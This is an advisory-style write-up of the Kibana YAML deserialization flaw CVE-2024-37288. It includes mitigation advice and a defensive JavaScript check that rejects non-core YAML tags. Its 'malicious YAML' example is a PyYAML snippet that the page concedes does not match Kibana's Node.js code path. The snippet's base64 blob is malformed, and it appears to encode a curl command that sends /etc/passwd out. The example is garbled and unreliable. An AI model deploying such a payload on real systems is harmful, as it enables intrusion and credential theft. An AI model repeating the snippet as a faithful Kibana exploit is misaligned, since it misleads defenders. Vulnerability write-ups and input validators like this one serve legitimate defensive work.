A deserialization vulnerability has recently been disclosed in Kibana (CVE-2024-37288). It can lead to arbitrary code execution when Kibana parses a YAML document containing a crafted payload. The issue affects users of Elastic Security's built-in AI tools (https://www.elastic.co/guide/en/security/current/ai-for-security.html) who have also configured an Amazon Bedrock connector (https://www.elastic.co/guide/en/security/current/assistant-connect-to-bedrock.html).
Code Snippet
```python
# Below is an example of a malicious YAML document that could exploit this vulnerability.
# Note: the python/object tag used here is specific to PyYAML; Kibana itself is a
# Node.js application, so this snippet illustrates the bug class, not Kibana's code path.
import yaml

payload = '''
!!python/object/new:yaml.Loader
kwargs:
  stream: !!binary |
    aW1wb3JIG9zLCBzdWJwcm9jZXNzDQpzdWJwcm9jZXNzLmNhbGwoc
    y5gIHdoaWNoIGN1cmwgYmFzaHMgJihjYXQgL2VYy9wYXNzd2Qgf
    CBjdXJsIC1GICdwaGFzZXJfdG9rZW49XCh4eHgpJyAtLGRhdGEt
    dXJsZW5jb2RlIC1YLUluc3RhbGxlZC9iaW47ZG9uZQ==
'''

# Deserialize the malicious payload. Note: recent PyYAML versions restrict
# python/object tags under FullLoader, so this call may raise a ConstructorError
# instead of constructing the object.
objects_deserialized = yaml.load(payload, Loader=yaml.FullLoader)
```
1. An attacker crafts a malicious YAML document containing a specially crafted payload.
2. The malicious YAML document is parsed by Kibana when Elastic Security's built-in AI tools are in use and an Amazon Bedrock connector is configured.
3. The deserialization vulnerability is triggered, allowing the attacker to execute arbitrary code with the privileges of the Kibana process.
Links to Original References
- Elastic Security's AI Tools: https://www.elastic.co/guide/en/security/current/ai-for-security.html
- Amazon Bedrock Connector configuration: https://www.elastic.co/guide/en/security/current/assistant-connect-to-bedrock.html
- CVE-2024-37288: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37288
Mitigation Options
While a patch for this vulnerability is being developed, users should disable their Amazon Bedrock connector and, where possible, avoid using Elastic Security's AI tools. Preventative actions against this Kibana vulnerability include:
1. Removing unnecessary integrations: Until a patch is released, users should reconsider using Elastic Security's AI tools and limit unnecessary integrations or configurations in Kibana.
2. Validating input YAML documents: Implement additional checks on a YAML document's content or structure before Kibana parses it.
3. Monitoring for suspicious activity: Watch Kibana logs and network traffic for unexpected behavior or unauthorized access attempts.
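As an added example of the validation step above (this is not Kibana's or Elastic's code), the following pre-parse gate scans a YAML document for explicit tags and rejects anything outside a small allowlist of core types, so that a document carrying a language-specific object tag never reaches the loader. It assumes a simplified tokenization of YAML tags (described in the comments) and uses constructed sample documents, not the page's payload.

```javascript
// Added example: reject YAML documents carrying non-core tags before they
// reach a YAML loader. Not Kibana's or Elastic's code. Simplification
// (assumption): a tag is a '!' token at line start, after whitespace or after
// one of "[{,:-", outside quoted scalars and comments; block-scalar bodies are
// not special-cased, so a '!' there is also reported (erring on the safe side).
const CORE_TAGS = new Set(['!!str', '!!int', '!!float', '!!bool', '!!null',
                           '!!map', '!!seq', '!!timestamp']);

// Return every tag token found, with its 1-based line number.
function findTags(doc) {
  const tags = [];
  let quote = null;                          // active quote char, if any
  for (let i = 0; i < doc.length; ) {
    const c = doc[i];
    if (quote) {                             // inside a quoted scalar
      if (c === '\\' && quote === '"') { i += 2; continue; }
      if (c === quote) quote = null;
      i += 1; continue;
    }
    const prev = i === 0 ? '\n' : doc[i - 1];
    if (c === '#' && /\s/.test(prev)) {      // comment: skip to end of line
      while (i < doc.length && doc[i] !== '\n') i += 1;
      continue;
    }
    if (c === '"' || c === "'") { quote = c; i += 1; continue; }
    if (c === '!' && /[\s\[{,:-]/.test(prev)) {
      let j = i;                             // tag runs until a delimiter
      while (j < doc.length && !/[\s\[\]{},]/.test(doc[j])) j += 1;
      const line = doc.slice(0, i).split('\n').length;
      tags.push({ tag: doc.slice(i, j), line });
      i = j; continue;
    }
    i += 1;
  }
  return tags;
}

// Gate: ok only when every tag is allowlisted; rejected lists the offenders.
function checkYamlTags(doc, allowed = CORE_TAGS) {
  const rejected = findTags(doc).filter((t) => !allowed.has(t.tag));
  return { ok: rejected.length === 0, rejected };
}

// Constructed sample documents (the base64 body is a placeholder, not the
// page's blob): the first mirrors the payload shape above, the second is benign.
const MALICIOUS_DOC = ['!!python/object/new:yaml.Loader', 'kwargs:',
  '  stream: !!binary |', '    aGVsbG8=', ''].join('\n');
const BENIGN_DOC = ['name: "hello!"   # a "!" in quotes or comments is not a tag',
  "note: 'it''s fine'", 'age: !!int "42"', 'items: [1, !!str 2]', ''].join('\n');
```

Run `checkYamlTags(doc)` on the document before handing it to the YAML library; a `rejected` entry gives the offending tag and line, which is also useful as a log line for the monitoring step.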
Conclusion
The CVE-2024-37288 Kibana vulnerability is a serious issue that can give attackers the ability to execute arbitrary code on the affected system. Users of Elastic Security's built-in AI tools or the Amazon Bedrock connector are encouraged to take appropriate steps to protect their systems until a patch is available.
Timeline
Published on: 09/09/2024 09:15:02 UTC
Last modified on: 09/16/2024 13:29:06 UTC